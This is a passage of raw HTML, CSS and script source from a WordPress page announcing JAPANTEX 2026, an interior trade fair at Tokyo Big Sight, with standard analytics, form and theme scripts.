.elementor-container{max-width:1024px;}.e-con{--container-max-width:1024px;}}@media(max-width:767px){.elementor-kit-6{--e-global-typography-theme_font_p-font-size:15px;--e-global-typography-theme_font_h1-font-size:36px;--e-global-typography-theme_font_h2-font-size:31px;--e-global-typography-theme_font_h3-font-size:26px;--e-global-typography-theme_font_h5-font-size:19px;--e-global-typography-theme_font_h6-font-size:17px;--e-global-typography-theme_font_logo-font-size:22px;--e-global-typography-theme_font_button-font-size:15px;}.elementor-section.elementor-section-boxed > .elementor-container{max-width:767px;}.e-con{--container-max-width:767px;}}
- .elementor-20657 .elementor-element.elementor-element-201f3829{--display:flex;--flex-direction:row;--container-widget-width:calc( ( 1 - var( --container-widget-flex-grow ) ) * 100% );--container-widget-height:100%;--container-widget-flex-grow:1;--container-widget-align-self:stretch;--flex-wrap-mobile:wrap;--align-items:stretch;--gap:0px 0px;--row-gap:0px;--column-gap:0px;--margin-top:5%;--margin-bottom:0%;--margin-left:0%;--margin-right:0%;--padding-top:0%;--padding-bottom:0%;--padding-left:3%;--padding-right:3%;}.elementor-20657 .elementor-element.elementor-element-201f3829 .trx_addons_bg_text{z-index:0;}.elementor-20657 .elementor-element.elementor-element-201f3829 .trx_addons_bg_text.trx_addons_marquee_wrap:not(.trx_addons_marquee_reverse) .trx_addons_marquee_element{padding-right:50px;}.elementor-20657 .elementor-element.elementor-element-201f3829 .trx_addons_bg_text.trx_addons_marquee_wrap.trx_addons_marquee_reverse .trx_addons_marquee_element{padding-left:50px;}.elementor-20657 .elementor-element.elementor-element-38901095{--display:flex;--flex-direction:column;--container-widget-width:100%;--container-widget-height:initial;--container-widget-flex-grow:0;--container-widget-align-self:initial;--flex-wrap-mobile:wrap;--justify-content:center;--gap:15px 15px;--row-gap:15px;--column-gap:15px;--padding-top:0%;--padding-bottom:0%;--padding-left:0%;--padding-right:5%;}.elementor-20657 .elementor-element.elementor-element-38901095 .trx_addons_bg_text{z-index:0;}.elementor-20657 .elementor-element.elementor-element-38901095 .trx_addons_bg_text.trx_addons_marquee_wrap:not(.trx_addons_marquee_reverse) .trx_addons_marquee_element{padding-right:50px;}.elementor-20657 .elementor-element.elementor-element-38901095 .trx_addons_bg_text.trx_addons_marquee_wrap.trx_addons_marquee_reverse .trx_addons_marquee_element{padding-left:50px;}.elementor-20657 .elementor-element.elementor-element-43bf9413{--display:flex;--flex-direction:column;--container-widget-width:calc( ( 1 - var( --container-widget-flex-grow ) ) * 100% );--container-widget-height:initial;--container-widget-flex-grow:0;--container-widget-align-self:initial;--flex-wrap-mobile:wrap;--justify-content:center;--align-items:stretch;--gap:20px 20px;--row-gap:20px;--column-gap:20px;--margin-top:12%;--margin-bottom:0%;--margin-left:0%;--margin-right:0%;--padding-top:0%;--padding-bottom:0%;--padding-left:3%;--padding-right:3%;}.elementor-20657 .elementor-element.elementor-element-43bf9413 .trx_addons_bg_text{z-index:0;}.elementor-20657 .elementor-element.elementor-element-43bf9413 .trx_addons_bg_text.trx_addons_marquee_wrap:not(.trx_addons_marquee_reverse) .trx_addons_marquee_element{padding-right:50px;}.elementor-20657 .elementor-element.elementor-element-43bf9413 .trx_addons_bg_text.trx_addons_marquee_wrap.trx_addons_marquee_reverse .trx_addons_marquee_element{padding-left:50px;}.elementor-20657 .elementor-element.elementor-element-7d9e381d{text-align:start;}.elementor-20657 .elementor-element.elementor-element-7d9e381d .elementor-heading-title{font-family:"Poppins", Sans-serif;font-size:65px;font-weight:600;text-transform:none;font-style:normal;text-decoration:none;line-height:1.2em;letter-spacing:0px;word-spacing:0em;color:#1C244B;}.elementor-20657 .elementor-element.elementor-element-67e379b{text-align:center;}.elementor-20657 .elementor-element.elementor-element-67e379b .elementor-heading-title{font-family:"Poppins", Sans-serif;font-size:65px;font-weight:600;text-transform:none;font-style:normal;text-decoration:none;line-height:1.2em;letter-spacing:0px;word-spacing:0em;color:#1C244B;}.elementor-20657 .elementor-element.elementor-element-68d72d46{text-align:center;font-family:"Poppins", Sans-serif;font-size:22px;font-weight:300;text-transform:none;font-style:normal;text-decoration:none;line-height:1.5em;letter-spacing:0px;word-spacing:0em;color:#324A6D;}.elementor-20657 .elementor-element.elementor-element-b1d01b5{text-align:center;font-family:"Poppins", Sans-serif;font-size:22px;font-weight:300;text-transform:none;font-style:normal;text-decoration:none;line-height:1.5em;letter-spacing:0px;word-spacing:0em;color:#324A6D;}.elementor-20657 .elementor-element.elementor-element-1433fc9b > .elementor-widget-container{padding:0% 20% 0% 20%;}.elementor-20657 .elementor-element.elementor-element-1433fc9b{text-align:center;font-family:"Poppins", Sans-serif;font-size:16px;font-weight:300;text-transform:none;font-style:normal;text-decoration:none;line-height:1.5em;letter-spacing:0px;word-spacing:0em;color:#324A6D;}.elementor-20657 .elementor-element.elementor-element-4e19e6a > .elementor-widget-container{padding:0% 20% 0% 20%;}.elementor-20657 .elementor-element.elementor-element-4e19e6a{text-align:center;font-family:"Poppins", Sans-serif;font-size:16px;font-weight:300;text-transform:none;font-style:normal;text-decoration:none;line-height:1.5em;letter-spacing:0px;word-spacing:0em;color:#324A6D;}.elementor-20657 .elementor-element.elementor-element-2b46c6bf .elementor-button{background-color:#467FF7;font-family:"Poppins", Sans-serif;font-size:16px;font-weight:400;text-transform:capitalize;font-style:normal;text-decoration:none;line-height:1em;letter-spacing:0px;word-spacing:0em;fill:#FFFFFF;color:#FFFFFF;border-style:solid;border-width:1px 1px 1px 1px;border-color:#467FF7;border-radius:100px 100px 100px 100px;padding:16px 55px 16px 55px;}.elementor-20657 .elementor-element.elementor-element-2b46c6bf .elementor-button:hover, .elementor-20657 .elementor-element.elementor-element-2b46c6bf .elementor-button:focus{background-color:#02010100;color:#467FF7;}.elementor-20657 .elementor-element.elementor-element-2b46c6bf .elementor-button:hover svg, .elementor-20657 .elementor-element.elementor-element-2b46c6bf .elementor-button:focus svg{fill:#467FF7;}.elementor-20657 .elementor-element.elementor-element-2b83a3f .elementor-button{background-color:#467FF7;font-family:"Poppins", Sans-serif;font-size:16px;font-weight:400;text-transform:capitalize;font-style:normal;text-decoration:none;line-height:1em;letter-spacing:0px;word-spacing:0em;fill:#FFFFFF;color:#FFFFFF;border-style:solid;border-width:1px 1px 1px 1px;border-color:#467FF7;border-radius:100px 100px 100px 100px;padding:16px 55px 16px 55px;}.elementor-20657 .elementor-element.elementor-element-2b83a3f .elementor-button:hover, .elementor-20657 .elementor-element.elementor-element-2b83a3f .elementor-button:focus{background-color:#02010100;color:#467FF7;}.elementor-20657 .elementor-element.elementor-element-2b83a3f .elementor-button:hover svg, .elementor-20657 .elementor-element.elementor-element-2b83a3f .elementor-button:focus svg{fill:#467FF7;}body.elementor-page-20657:not(.elementor-motion-effects-element-type-background), body.elementor-page-20657 > .elementor-motion-effects-container > .elementor-motion-effects-layer{background-color:#FFFFFF;}@media(max-width:1024px){.elementor-20657 .elementor-element.elementor-element-201f3829{--min-height:500px;--flex-direction:column;--container-widget-width:100%;--container-widget-height:initial;--container-widget-flex-grow:0;--container-widget-align-self:initial;--flex-wrap-mobile:wrap;--margin-top:5%;--margin-bottom:0%;--margin-left:0%;--margin-right:0%;--padding-top:0%;--padding-bottom:0%;--padding-left:5%;--padding-right:5%;}.elementor-20657 .elementor-element.elementor-element-38901095{--padding-top:0%;--padding-bottom:0%;--padding-left:0%;--padding-right:35%;}.elementor-20657 .elementor-element.elementor-element-43bf9413{--margin-top:15%;--margin-bottom:0%;--margin-left:0%;--margin-right:0%;--padding-top:0%;--padding-bottom:0%;--padding-left:5%;--padding-right:5%;}.elementor-20657 .elementor-element.elementor-element-7d9e381d .elementor-heading-title{font-size:42px;}.elementor-20657 .elementor-element.elementor-element-67e379b .elementor-heading-title{font-size:42px;}.elementor-20657 .elementor-element.elementor-element-68d72d46{font-size:16px;}.elementor-20657 .elementor-element.elementor-element-b1d01b5{font-size:16px;}.elementor-20657 .elementor-element.elementor-element-1433fc9b > .elementor-widget-container{padding:0% 5% 0% 5%;}.elementor-20657 .elementor-element.elementor-element-1433fc9b{font-size:14px;}.elementor-20657 .elementor-element.elementor-element-4e19e6a > .elementor-widget-container{padding:0% 5% 0% 5%;}.elementor-20657 .elementor-element.elementor-element-4e19e6a{font-size:14px;}.elementor-20657 .elementor-element.elementor-element-2b46c6bf .elementor-button{font-size:14px;}.elementor-20657 .elementor-element.elementor-element-2b83a3f .elementor-button{font-size:14px;}}@media(max-width:767px){.elementor-20657 .elementor-element.elementor-element-201f3829{--min-height:0vh;--margin-top:8%;--margin-bottom:0%;--margin-left:0%;--margin-right:0%;--padding-top:0%;--padding-bottom:0%;--padding-left:5%;--padding-right:5%;}.elementor-20657 .elementor-element.elementor-element-38901095{--padding-top:0%;--padding-bottom:0%;--padding-left:0%;--padding-right:0%;}.elementor-20657 .elementor-element.elementor-element-43bf9413{--margin-top:25%;--margin-bottom:0%;--margin-left:0%;--margin-right:0%;}.elementor-20657 .elementor-element.elementor-element-7d9e381d{text-align:center;}.elementor-20657 .elementor-element.elementor-element-7d9e381d .elementor-heading-title{font-size:28px;line-height:1.1em;}.elementor-20657 .elementor-element.elementor-element-67e379b{text-align:center;}.elementor-20657 .elementor-element.elementor-element-67e379b .elementor-heading-title{font-size:28px;line-height:1.1em;}.elementor-20657 .elementor-element.elementor-element-68d72d46{text-align:center;font-size:14px;}.elementor-20657 .elementor-element.elementor-element-b1d01b5{text-align:center;font-size:14px;}.elementor-20657 .elementor-element.elementor-element-1433fc9b > .elementor-widget-container{padding:0% 0% 0% 0%;}.elementor-20657 .elementor-element.elementor-element-4e19e6a > .elementor-widget-container{padding:0% 0% 0% 0%;}.elementor-20657 .elementor-element.elementor-element-2b46c6bf .elementor-button{padding:15px 35px 15px 35px;}.elementor-20657 .elementor-element.elementor-element-2b83a3f .elementor-button{padding:15px 35px 15px 35px;}}@media(min-width:768px){.elementor-20657 .elementor-element.elementor-element-38901095{--width:100%;}.elementor-20657 .elementor-element.elementor-element-43bf9413{--content-width:750px;}}@media(max-width:1024px) and (min-width:768px){.elementor-20657 .elementor-element.elementor-element-38901095{--width:100%;}.elementor-20657 .elementor-element.elementor-element-43bf9413{--content-width:500px;}}
- /*# sourceURL=elementor-frontend-inline-css */
- </style>
- <link property="stylesheet" rel='stylesheet' id='sbistyles-css' href='https://japantex.jp/wp-content/plugins/instagram-feed/css/sbi-styles.min.css?ver=6.10.0' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='widget-heading-css' href='https://japantex.jp/wp-content/plugins/elementor/assets/css/widget-heading.min.css?ver=3.35.5' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='mediaelement-css' href='https://japantex.jp/wp-includes/js/mediaelement/mediaelementplayer-legacy.min.css?ver=4.2.17' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='wp-mediaelement-css' href='https://japantex.jp/wp-includes/js/mediaelement/wp-mediaelement.min.css?ver=6.9.1' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='elementor-gf-local-roboto-css' href='https://japantex.jp/wp-content/uploads/elementor/google-fonts/css/roboto.css?ver=1742508431' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='elementor-gf-local-robotoslab-css' href='https://japantex.jp/wp-content/uploads/elementor/google-fonts/css/robotoslab.css?ver=1742508438' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='elementor-gf-local-poppins-css' href='https://japantex.jp/wp-content/uploads/elementor/google-fonts/css/poppins.css?ver=1772355880' type='text/css' media='all' />
- <script src="https://japantex.jp/wp-includes/js/jquery/jquery.min.js?ver=3.7.1" id="jquery-core-js"></script>
- <script src="https://japantex.jp/wp-includes/js/jquery/jquery-migrate.min.js?ver=3.4.1" id="jquery-migrate-js"></script>
- <!-- Site Kit によって追加された Google タグ(gtag.js)スニペット -->
- <!-- Google アナリティクス スニペット (Site Kit が追加) -->
- <script src="https://www.googletagmanager.com/gtag/js?id=G-N0TES8WGX9" id="google_gtagjs-js" async></script>
- <script id="google_gtagjs-js-after">
- /* <![CDATA[ */
- window.dataLayer = window.dataLayer || [];function gtag(){dataLayer.push(arguments);}
- gtag("set","linker",{"domains":["japantex.jp"]});
- gtag("js", new Date());
- gtag("set", "developer_id.dZTNiMT", true);
- gtag("config", "G-N0TES8WGX9", {"googlesitekit_post_type":"page"});
- window._googlesitekit = window._googlesitekit || {}; window._googlesitekit.throttledEvents = []; window._googlesitekit.gtagEvent = (name, data) => { var key = JSON.stringify( { name, data } ); if ( !! window._googlesitekit.throttledEvents[ key ] ) { return; } window._googlesitekit.throttledEvents[ key ] = true; setTimeout( () => { delete window._googlesitekit.throttledEvents[ key ]; }, 5 ); gtag( "event", name, { ...data, event_source: "site-kit" } ); };
- //# sourceURL=google_gtagjs-js-after
- /* ]]> */
- </script>
- <link rel="https://api.w.org/" href="https://japantex.jp/wp-json/" /><link rel="alternate" title="JSON" type="application/json" href="https://japantex.jp/wp-json/wp/v2/pages/20657" /><link rel="EditURI" type="application/rsd+xml" title="RSD" href="https://japantex.jp/xmlrpc.php?rsd" />
- <meta name="generator" content="WordPress 6.9.1" />
- <link rel="canonical" href="https://japantex.jp/" />
- <link rel='shortlink' href='https://japantex.jp/' />
- <meta name="generator" content="Site Kit by Google 1.173.0" /><meta name="generator" content="Elementor 3.35.5; features: e_font_icon_svg, additional_custom_breakpoints; settings: css_print_method-internal, google_font-enabled, font_display-swap">
- <style>
- .e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload),
- .e-con.e-parent:nth-of-type(n+4):not(.e-lazyloaded):not(.e-no-lazyload) * {
- background-image: none !important;
- }
- @media screen and (max-height: 1024px) {
- .e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload),
- .e-con.e-parent:nth-of-type(n+3):not(.e-lazyloaded):not(.e-no-lazyload) * {
- background-image: none !important;
- }
- }
- @media screen and (max-height: 640px) {
- .e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload),
- .e-con.e-parent:nth-of-type(n+2):not(.e-lazyloaded):not(.e-no-lazyload) * {
- background-image: none !important;
- }
- }
- </style>
- <!-- Google タグ マネージャー スニペット (Site Kit が追加) -->
- <script>
- /* <![CDATA[ */
- ( function( w, d, s, l, i ) {
- w[l] = w[l] || [];
- w[l].push( {'gtm.start': new Date().getTime(), event: 'gtm.js'} );
- var f = d.getElementsByTagName( s )[0],
- j = d.createElement( s ), dl = l != 'dataLayer' ? '&l=' + l : '';
- j.async = true;
- j.src = 'https://www.googletagmanager.com/gtm.js?id=' + i + dl;
- f.parentNode.insertBefore( j, f );
- } )( window, document, 'script', 'dataLayer', 'GTM-PSNZKTGN' );
- /* ]]> */
- </script>
- <!-- (ここまで) Google タグ マネージャー スニペット (Site Kit が追加) -->
- <link rel="icon" href="https://japantex.jp/wp-content/uploads/2025/03/cropped-japantex-favicon-50x50.png" sizes="32x32" />
- <link rel="icon" href="https://japantex.jp/wp-content/uploads/2025/03/cropped-japantex-favicon-300x300.png" sizes="192x192" />
- <link rel="apple-touch-icon" href="https://japantex.jp/wp-content/uploads/2025/03/cropped-japantex-favicon-180x180.png" />
- <meta name="msapplication-TileImage" content="https://japantex.jp/wp-content/uploads/2025/03/cropped-japantex-favicon-300x300.png" />
- <meta name="viewport" content="width=device-width, initial-scale=1.0, viewport-fit=cover" />
- <link property="stylesheet" rel='stylesheet' id='trx_addons-icons-css' href='https://japantex.jp/wp-content/plugins/trx_addons/css/font-icons/css/trx_addons_icons.css' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='magnific-popup-css' href='https://japantex.jp/wp-content/plugins/trx_addons/js/magnific/magnific-popup.min.css' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='trx_addons-css' href='https://japantex.jp/wp-content/plugins/trx_addons/css/__styles.css' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='trx_addons-animations-css' href='https://japantex.jp/wp-content/plugins/trx_addons/css/trx_addons.animations.css' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='trx_addons-elementor-widgets-css' href='https://japantex.jp/wp-content/plugins/trx_addons/addons/elementor-widgets/assets/frontend.css' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='bite-font-google_fonts-css' href='https://fonts.googleapis.com/css2?family=Work+Sans:ital,wght@0,100..900;1,100..900&family=Lexend:[email protected]&subset=latin,latin-ext&display=swap' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='bite-fontello-css' href='https://japantex.jp/wp-content/themes/bite/skins/default/css/font-icons/css/fontello.css' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='bite-style-css' href='https://japantex.jp/wp-content/themes/bite/style.css' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='bite-skin-default-css' href='https://japantex.jp/wp-content/themes/bite/skins/default/css/style.css' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='bite-plugins-css' href='https://japantex.jp/wp-content/themes/bite/skins/default/css/__plugins.css' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='bite-custom-css' href='https://japantex.jp/wp-content/themes/bite/skins/default/css/__custom.css' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='bite-child-css' href='https://japantex.jp/wp-content/themes/bite-child/style.css' type='text/css' media='all' />
- <link property="stylesheet" rel='stylesheet' id='trx_addons-responsive-css' href='https://japantex.jp/wp-content/plugins/trx_addons/css/__responsive.css' type='text/css' media='(max-width:1439px)' />
- <link property="stylesheet" rel='stylesheet' id='bite-responsive-css' href='https://japantex.jp/wp-content/themes/bite/skins/default/css/__responsive.css' type='text/css' media='(max-width:1679px)' />
- <link property="stylesheet" rel='stylesheet' id='bite-responsive-child-css' href='https://japantex.jp/wp-content/themes/bite-child/responsive.css' type='text/css' media='(max-width:1679px)' /></head>
- <body class="home wp-singular page-template page-template-elementor_canvas page page-id-20657 wp-custom-logo wp-embed-responsive wp-theme-bite wp-child-theme-bite-child trx_addons_customizable_theme frontpage skin_default elementor-use-container scheme_default blog_mode_front body_style_wide is_stream blog_style_classic_2 sidebar_hide expand_content trx_addons_present header_type_custom header_style_header-custom-20682 header_position_default menu_side_ no_layout fixed_blocks_sticky elementor-default elementor-template-canvas elementor-kit-6 elementor-page elementor-page-20657">
- <!-- Google タグ マネージャー (noscript) スニペット (Site Kit が追加) -->
- <noscript>
- <iframe src="https://www.googletagmanager.com/ns.html?id=GTM-PSNZKTGN" height="0" width="0" style="display:none;visibility:hidden"></iframe>
- </noscript>
- <!-- (ここまで) Google タグ マネージャー (noscript) スニペット (Site Kit が追加) -->
- <div data-elementor-type="wp-page" data-elementor-id="20657" class="elementor elementor-20657">
- <div class="elementor-element elementor-element-201f3829 e-con-full e-flex sc_layouts_column_icons_position_left e-con e-parent" data-id="201f3829" data-element_type="container" data-e-type="container" data-settings="{"background_background":"classic"}">
- <div class="e-con-gap-no elementor-element elementor-element-38901095 e-con-full e-flex sc_layouts_column_icons_position_left e-con e-child" data-id="38901095" data-element_type="container" data-e-type="container">
- </div>
- </div>
- <div class="e-con-with-custom-width elementor-element elementor-element-43bf9413 e-flex e-con-boxed sc_layouts_column_icons_position_left e-con e-parent" data-id="43bf9413" data-element_type="container" data-e-type="container">
- <div class="e-con-inner">
- <div class="elementor-element elementor-element-67e379b sc_fly_static elementor-widget elementor-widget-heading" data-id="67e379b" data-element_type="widget" data-e-type="widget" data-widget_type="heading.default">
- <div class="elementor-widget-container">
- <h3 class="elementor-heading-title elementor-size-default">JAPANTEX 2026</h3> </div>
- </div>
- <div class="elementor-element elementor-element-68d72d46 sc_fly_static elementor-widget elementor-widget-text-editor" data-id="68d72d46" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
- <div class="elementor-widget-container">
- <p>JAPANTEX 2026 テーマ:</p><p>『インテリアの“これから”がここにある』<br />~素材とデザインの新たなカタチ~</p> </div>
- </div>
- <div class="elementor-element elementor-element-b1d01b5 sc_fly_static elementor-widget elementor-widget-text-editor" data-id="b1d01b5" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
- <div class="elementor-widget-container">
- <p>日程と場所:</p><p>11月18~20日 東京ビッグサイト 西4ホール</p> </div>
- </div>
- <div class="elementor-element elementor-element-1433fc9b sc_fly_static elementor-widget elementor-widget-text-editor" data-id="1433fc9b" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
- <div class="elementor-widget-container">
- <p>JAPANTEX 2026 Theme: “The Future of Interiors Starts Here” ~New Dimensions in Materials and Design~</p> </div>
- </div>
- <div class="elementor-element elementor-element-4e19e6a sc_fly_static elementor-widget elementor-widget-text-editor" data-id="4e19e6a" data-element_type="widget" data-e-type="widget" data-widget_type="text-editor.default">
- <div class="elementor-widget-container">
- <p>Date & Venue: November 18–20 Tokyo Big Sight, West Hall 4</p> </div>
- </div>
- <div class="elementor-element elementor-element-2b46c6bf elementor-mobile-align-center elementor-align-center sc_fly_static elementor-widget elementor-widget-button" data-id="2b46c6bf" data-element_type="widget" data-e-type="widget" data-widget_type="button.default">
- <div class="elementor-widget-container">
- <div class="elementor-button-wrapper">
- <a class="elementor-button elementor-button-link elementor-size-sm" href="https://japantex2025.japantex.jp/">
- <span class="elementor-button-content-wrapper">
- <span class="elementor-button-text">旧サイト JAPANTEX2025</span>
- </span>
- </a>
- </div>
- </div>
- </div>
- <div class="elementor-element elementor-element-2b83a3f elementor-mobile-align-center elementor-align-center sc_fly_static elementor-widget elementor-widget-button" data-id="2b83a3f" data-element_type="widget" data-e-type="widget" data-widget_type="button.default">
- <div class="elementor-widget-container">
- <div class="elementor-button-wrapper">
- <a class="elementor-button elementor-button-link elementor-size-sm" href="https://japantex.jp/contact/">
- <span class="elementor-button-content-wrapper">
- <span class="elementor-button-text">問い合わせフォーム (ご出展希望、資料送付希望など)</span>
- </span>
- </a>
- </div>
- </div>
- </div>
- </div>
- </div>
- </div>
- <a href="#" role="button" class="trx_addons_scroll_to_top trx_addons_icon-up" title="Scroll to top"></a>
- <script type="speculationrules">
- {"prefetch":[{"source":"document","where":{"and":[{"href_matches":"/*"},{"not":{"href_matches":["/wp-*.php","/wp-admin/*","/wp-content/uploads/*","/wp-content/*","/wp-content/plugins/*","/wp-content/themes/bite-child/*","/wp-content/themes/bite/*","/*\\?(.+)"]}},{"not":{"selector_matches":"a[rel~=\"nofollow\"]"}},{"not":{"selector_matches":".no-prefetch, .no-prefetch a"}}]},"eagerness":"conservative"}]}
- </script>
- <!-- Instagram Feed JS -->
- <script>
- var sbiajaxurl = "https://japantex.jp/wp-admin/admin-ajax.php";
- </script>
- <script>
- const lazyloadRunObserver = () => {
- const lazyloadBackgrounds = document.querySelectorAll( `.e-con.e-parent:not(.e-lazyloaded)` );
- const lazyloadBackgroundObserver = new IntersectionObserver( ( entries ) => {
- entries.forEach( ( entry ) => {
- if ( entry.isIntersecting ) {
- let lazyloadBackground = entry.target;
- if( lazyloadBackground ) {
- lazyloadBackground.classList.add( 'e-lazyloaded' );
- }
- lazyloadBackgroundObserver.unobserve( entry.target );
- }
- });
- }, { rootMargin: '200px 0px 200px 0px' } );
- lazyloadBackgrounds.forEach( ( lazyloadBackground ) => {
- lazyloadBackgroundObserver.observe( lazyloadBackground );
- } );
- };
- const events = [
- 'DOMContentLoaded',
- 'elementor/lazyload/observe',
- ];
- events.forEach( ( event ) => {
- document.addEventListener( event, lazyloadRunObserver );
- } );
- </script>
- <script src="https://japantex.jp/wp-includes/js/dist/hooks.min.js?ver=dd5603f07f9220ed27f1" id="wp-hooks-js"></script>
- <script src="https://japantex.jp/wp-includes/js/dist/i18n.min.js?ver=c26c3dc7bed366793375" id="wp-i18n-js"></script>
- <script id="wp-i18n-js-after">
- /* <![CDATA[ */
- wp.i18n.setLocaleData( { 'text direction\u0004ltr': [ 'ltr' ] } );
- //# sourceURL=wp-i18n-js-after
- /* ]]> */
- </script>
- <script src="https://japantex.jp/wp-content/plugins/contact-form-7/includes/swv/js/index.js?ver=6.1.5" id="swv-js"></script>
- <script id="contact-form-7-js-translations">
- /* <![CDATA[ */
- ( function( domain, translations ) {
- var localeData = translations.locale_data[ domain ] || translations.locale_data.messages;
- localeData[""].domain = domain;
- wp.i18n.setLocaleData( localeData, domain );
- } )( "contact-form-7", {"translation-revision-date":"2025-11-30 08:12:23+0000","generator":"GlotPress\/4.0.3","domain":"messages","locale_data":{"messages":{"":{"domain":"messages","plural-forms":"nplurals=1; plural=0;","lang":"ja_JP"},"This contact form is placed in the wrong place.":["\u3053\u306e\u30b3\u30f3\u30bf\u30af\u30c8\u30d5\u30a9\u30fc\u30e0\u306f\u9593\u9055\u3063\u305f\u4f4d\u7f6e\u306b\u7f6e\u304b\u308c\u3066\u3044\u307e\u3059\u3002"],"Error:":["\u30a8\u30e9\u30fc:"]}},"comment":{"reference":"includes\/js\/index.js"}} );
- //# sourceURL=contact-form-7-js-translations
- /* ]]> */
- </script>
- <script id="contact-form-7-js-before">
- /* <![CDATA[ */
- var wpcf7 = {
- "api": {
- "root": "https:\/\/japantex.jp\/wp-json\/",
- "namespace": "contact-form-7\/v1"
- },
- "cached": 1
- };
- //# sourceURL=contact-form-7-js-before
- /* ]]> */
- </script>
- <script src="https://japantex.jp/wp-content/plugins/contact-form-7/includes/js/index.js?ver=6.1.5" id="contact-form-7-js"></script>
- <script src="https://japantex.jp/wp-content/plugins/trx_addons/js/magnific/jquery.magnific-popup.min.js" id="magnific-popup-js"></script>
- <script id="trx_addons-js-extra">
- /* <![CDATA[ */
- var TRX_ADDONS_STORAGE = {"admin_mode":"","ajax_url":"https://japantex.jp/wp-admin/admin-ajax.php","ajax_nonce":"8ddc3b1ad5","rest_url":"https://japantex.jp/wp-json/","site_url":"https://japantex.jp","plugin_url":"https://japantex.jp/wp-content/plugins/trx_addons/","post_id":"20657","vc_edit_mode":"","is_preview":"","is_preview_gb":"","is_preview_elm":"","no_image":"https://japantex.jp/wp-content/plugins/trx_addons/css/images/no-image.jpg","popup_engine":"magnific","scroll_progress":"hide","hide_fixed_rows":"0","smooth_scroll":"","animate_inner_links":"0","disable_animation_on_mobile":"","add_target_blank":"0","menu_collapse":"1","menu_collapse_icon":"trx_addons_icon-ellipsis-vert","menu_stretch":"1","resize_tag_video":"","resize_tag_iframe":"1","allow_cookie_is_retina":"","mediaplayer_icons_selector_allowed":"","user_logged_in":"","theme_slug":"bite","theme_bg_color":"#FAF9F4","theme_accent_color":"#A44027","page_wrap_class":".page_wrap","header_wrap_class":".top_panel","footer_wrap_class":".footer_wrap","sidebar_wrap_class":".sidebar","columns_wrap_class":"trx_addons_columns_wrap","columns_in_single_row_class":"columns_in_single_row","column_class_template":"trx_addons_column-$1_$2","loading_layout":"\u003Cdiv class=\"trx_addons_loading trx_addons_loading_style_default\"\u003E\u003C/div\u003E","email_mask":"^([a-zA-Z0-9_\\-]+\\.)*[a-zA-Z0-9_\\-]+@[a-zA-Z0-9_\\-]+(\\.[a-zA-Z0-9_\\-]+)*\\.[a-zA-Z0-9]{2,12}$","mobile_breakpoint_fixedrows_off":"768","mobile_breakpoint_fixedcolumns_off":"768","mobile_breakpoint_stacksections_off":"768","mobile_breakpoint_scroll_lag_off":"0","mobile_breakpoint_fullheight_off":"1025","mobile_breakpoint_mousehelper_off":"1025","msg_caption_yes":"Yes","msg_caption_no":"No","msg_caption_ok":"OK","msg_caption_accept":"Accept","msg_caption_apply":"Apply","msg_caption_cancel":"Cancel","msg_caption_attention":"Attention!","msg_caption_warning":"Warning!","msg_ajax_error":"Invalid server answer!","msg_magnific_loading":"Loading image","msg_magnific_error":"Error loading image","msg_magnific_close":"Close (Esc)","msg_error_like":"Error saving your like! Please, try again later.","msg_field_name_empty":"The name can't be empty","msg_field_email_empty":"Too short (or empty) email address","msg_field_email_not_valid":"Invalid email address","msg_field_text_empty":"The message text can't be empty","msg_search_error":"Search error! Try again later.","msg_send_complete":"Send message complete!","msg_send_error":"Transmit failed!","msg_validation_error":"Error data validation!","msg_name_empty":"The name can't be empty","msg_name_long":"Too long name","msg_email_empty":"Too short (or empty) email address","msg_email_long":"E-mail address is too long","msg_email_not_valid":"E-mail address is invalid","msg_text_empty":"The message text can't be empty","msg_copied":"Copied!","ajax_views":"","menu_cache":[".menu_mobile_inner \u003E nav \u003E ul"],"login_via_ajax":"1","double_opt_in_registration":"1","msg_login_empty":"The Login field can't be empty","msg_login_long":"The Login field is too long","msg_password_empty":"The password can't be empty and shorter then 4 characters","msg_password_long":"The password is too long","msg_login_success":"Login success! The page should be reloaded in 3 sec.","msg_login_error":"Login failed!","msg_not_agree":"Please, read and check 'Terms and Conditions'","msg_password_not_equal":"The passwords in both fields are not equal","msg_registration_success":"Thank you for registering. Please confirm registration by clicking on the link in the letter sent to the specified email.","msg_registration_error":"Registration failed!","shapes_url":"https://japantex.jp/wp-content/themes/bite/skins/default/trx_addons/css/shapes/","add_to_links_url":[{"slug":"elementor","mask":"elementor.com/","link":"https://be.elementor.com/visit/?bta=2496&nci=5383&brand=elementor&utm_campaign=theme","args":{"afp":"trx25","landingPage":"@href"}}],"elementor_stretched_section_container":"","pagebuilder_preview_mode":"","elementor_animate_items":".elementor-heading-title,.sc_item_subtitle,.sc_item_title,.sc_item_descr,.sc_item_posts_container + .sc_item_button,.sc_item_button.sc_title_button,nav \u003E ul \u003E li,.give-grid__item,.trx-addons-advanced-title-item,.trx-addons-icon-list-item,.trx-addons-info-list-item,.trx-addons-marquee-item,.trx-addons-nav-menu \u003E .menu-item,.trx-addons-posts-item-wrap,.breadcrumbs \u003E .breadcrumbs_item, .breadcrumbs \u003E .breadcrumbs_delimiter,.trx-addons-post-meta-item, 